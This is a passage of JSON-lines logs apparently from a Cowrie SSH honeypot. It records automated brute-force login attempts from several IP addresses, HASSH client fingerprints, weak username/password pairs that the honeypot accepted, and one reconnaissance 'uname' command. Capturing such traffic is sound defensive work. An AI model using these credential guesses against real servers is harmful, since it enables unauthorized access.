"hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:03:21.070940Z","src_ip":"212.227.125.160","session":"4955d27621bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51302,"dst_ip":"1.2.3.4","dst_port":22,"session":"8984d860bf42","protocol":"ssh","message":"New connection: 212.227.235.229:51302 (1.2.3.4:22) [session: 8984d860bf42]","sensor":"my-vps","timestamp":"2025-08-31T07:03:22.509327Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40096,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca6f8b6b655e","protocol":"ssh","message":"New connection: 212.227.125.160:40096 (1.2.3.4:22) [session: ca6f8b6b655e]","sensor":"my-vps","timestamp":"2025-08-31T07:03:22.758418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:03:23.306380Z","src_ip":"212.227.125.160","session":"ca6f8b6b655e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:03:23.307131Z","src_ip":"212.227.125.160","session":"ca6f8b6b655e"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456789","message":"login attempt [www/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T07:03:24.952750Z","src_ip":"212.227.125.160","session":"ca6f8b6b655e"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:03:26.520882Z","src_ip":"212.227.125.160","session":"ca6f8b6b655e"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:03:32.763695Z","src_ip":"212.227.235.229","session":"067b8837eb10"}
{"eventid":"cowrie.session.closed","duration":"25.2","message":"Connection lost after 25.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:03:47.749105Z","src_ip":"212.227.235.229","session":"8984d860bf42"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:03:54.013196Z","src_ip":"212.227.235.229","session":"067b8837eb10"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T07:03:54.013857Z","src_ip":"212.227.235.229","session":"067b8837eb10"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:03:57.398472Z","src_ip":"212.227.125.160","session":"4955d27621bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:03:58.929664Z","src_ip":"212.227.235.229","session":"067b8837eb10"}
{"eventid":"cowrie.session.closed","duration":"75.2","message":"Connection lost after 75.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:03:58.930916Z","src_ip":"212.227.235.229","session":"067b8837eb10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56832,"dst_ip":"1.2.3.4","dst_port":22,"session":"288306020fb5","protocol":"ssh","message":"New connection: 212.227.235.229:56832 (1.2.3.4:22) [session: 288306020fb5]","sensor":"my-vps","timestamp":"2025-08-31T07:04:00.845237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:04:01.569731Z","src_ip":"212.227.235.229","session":"288306020fb5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:04:01.570736Z","src_ip":"212.227.235.229","session":"288306020fb5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60570,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1df99bc1139","protocol":"ssh","message":"New connection: 217.72.205.35:60570 (1.2.3.4:22) [session: f1df99bc1139]","sensor":"my-vps","timestamp":"2025-08-31T07:04:02.873633Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:04:02.874893Z","src_ip":"217.72.205.35","session":"f1df99bc1139"}
{"eventid":"cowrie.login.failed","username":"www","password":"password","message":"login attempt [www/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:04:07.274963Z","src_ip":"212.227.235.229","session":"288306020fb5"}
{"eventid":"cowrie.session.closed","duration":"64.2","message":"Connection lost after 64.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:04:07.436774Z","src_ip":"212.227.125.160","session":"4955d27621bc"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:04:09.193072Z","src_ip":"212.227.235.229","session":"288306020fb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43246,"dst_ip":"1.2.3.4","dst_port":22,"session":"80678e7bddd7","protocol":"ssh","message":"New connection: 212.227.125.160:43246 (1.2.3.4:22) [session: 80678e7bddd7]","sensor":"my-vps","timestamp":"2025-08-31T07:04:10.758484Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46710,"dst_ip":"1.2.3.4","dst_port":22,"session":"5570d6a09c2b","protocol":"ssh","message":"New connection: 212.227.125.160:46710 (1.2.3.4:22) [session: 5570d6a09c2b]","sensor":"my-vps","timestamp":"2025-08-31T07:04:22.086070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:04:22.667214Z","src_ip":"212.227.125.160","session":"5570d6a09c2b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:04:22.667972Z","src_ip":"212.227.125.160","session":"5570d6a09c2b"}
{"eventid":"cowrie.login.failed","username":"www","password":"password","message":"login attempt [www/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:04:24.730007Z","src_ip":"212.227.125.160","session":"5570d6a09c2b"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:04:26.235349Z","src_ip":"212.227.125.160","session":"5570d6a09c2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50748,"dst_ip":"1.2.3.4","dst_port":22,"session":"22773f8f5f21","protocol":"ssh","message":"New connection: 212.227.235.229:50748 (1.2.3.4:22) [session: 22773f8f5f21]","sensor":"my-vps","timestamp":"2025-08-31T07:04:33.014942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:04:33.015711Z","src_ip":"212.227.235.229","session":"22773f8f5f21"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-31T07:04:33.255323Z","src_ip":"212.227.235.229","session":"22773f8f5f21"}
{"eventid":"cowrie.session.closed","duration":"22.7","message":"Connection lost after 22.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:04:33.460392Z","src_ip":"212.227.125.160","session":"80678e7bddd7"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:04:33.971152Z","src_ip":"212.227.235.229","session":"22773f8f5f21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33160,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3d26b091ffa","protocol":"ssh","message":"New connection: 212.227.235.229:33160 (1.2.3.4:22) [session: e3d26b091ffa]","sensor":"my-vps","timestamp":"2025-08-31T07:04:47.041083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:04:50.171184Z","src_ip":"212.227.235.229","session":"e3d26b091ffa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:04:50.172184Z","src_ip":"212.227.235.229","session":"e3d26b091ffa"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-31T07:04:59.648292Z","src_ip":"212.227.235.229","session":"e3d26b091ffa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35114,"dst_ip":"1.2.3.4","dst_port":22,"session":"36555dbbf3b9","protocol":"ssh","message":"New connection: 212.227.235.229:35114 (1.2.3.4:22) [session: 36555dbbf3b9]","sensor":"my-vps","timestamp":"2025-08-31T07:05:00.359730Z"}
{"eventid":"cowrie.session.closed","duration":"13.7","message":"Connection lost after 13.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:05:00.736474Z","src_ip":"212.227.235.229","session":"e3d26b091ffa"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:05:01.621073Z","src_ip":"212.227.235.229","session":"36555dbbf3b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:05:01.622001Z","src_ip":"212.227.235.229","session":"36555dbbf3b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:05:04.100295Z","src_ip":"212.227.125.160","session":"97ba1f57bc3e"}
{"eventid":"cowrie.session.closed","duration":180.11313152313232,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:05:04.104485Z","src_ip":"212.227.125.160","session":"97ba1f57bc3e"}
{"eventid":"cowrie.login.failed","username":"www","password":"password1","message":"login attempt [www/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:07.510161Z","src_ip":"212.227.235.229","session":"36555dbbf3b9"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:05:09.365273Z","src_ip":"212.227.235.229","session":"36555dbbf3b9"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":49754,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d1f1a727bda","protocol":"ssh","message":"New connection: 80.94.95.15:49754 (1.2.3.4:22) [session: 3d1f1a727bda]","sensor":"my-vps","timestamp":"2025-08-31T07:05:10.200722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:05:10.201713Z","src_ip":"80.94.95.15","session":"3d1f1a727bda"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:05:10.267338Z","src_ip":"80.94.95.15","session":"3d1f1a727bda"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin","message":"login attempt [jaylin/jaylin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:10.613320Z","src_ip":"80.94.95.15","session":"3d1f1a727bda"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin1","message":"login attempt [jaylin/jaylin1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:11.680857Z","src_ip":"80.94.95.15","session":"3d1f1a727bda"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin123","message":"login attempt [jaylin/jaylin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:12.747844Z","src_ip":"80.94.95.15","session":"3d1f1a727bda"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin1234","message":"login attempt [jaylin/jaylin1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:13.815152Z","src_ip":"80.94.95.15","session":"3d1f1a727bda"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin12345","message":"login attempt [jaylin/jaylin12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:14.882918Z","src_ip":"80.94.95.15","session":"3d1f1a727bda"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:05:15.950082Z","src_ip":"80.94.95.15","session":"3d1f1a727bda"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":48218,"dst_ip":"1.2.3.4","dst_port":22,"session":"3764ca151039","protocol":"ssh","message":"New connection: 102.210.148.92:48218 (1.2.3.4:22) [session: 3764ca151039]","sensor":"my-vps","timestamp":"2025-08-31T07:05:15.962621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:05:15.963249Z","src_ip":"102.210.148.92","session":"3764ca151039"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:05:16.124735Z","src_ip":"102.210.148.92","session":"3764ca151039"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123@abc","message":"login attempt [ubuntu/123@abc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:16.810410Z","src_ip":"102.210.148.92","session":"3764ca151039"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:05:17.973503Z","src_ip":"102.210.148.92","session":"3764ca151039"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52932,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd277cfdf349","protocol":"ssh","message":"New connection: 212.227.125.160:52932 (1.2.3.4:22) [session: bd277cfdf349]","sensor":"my-vps","timestamp":"2025-08-31T07:05:22.303601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:05:22.724177Z","src_ip":"212.227.125.160","session":"bd277cfdf349"}
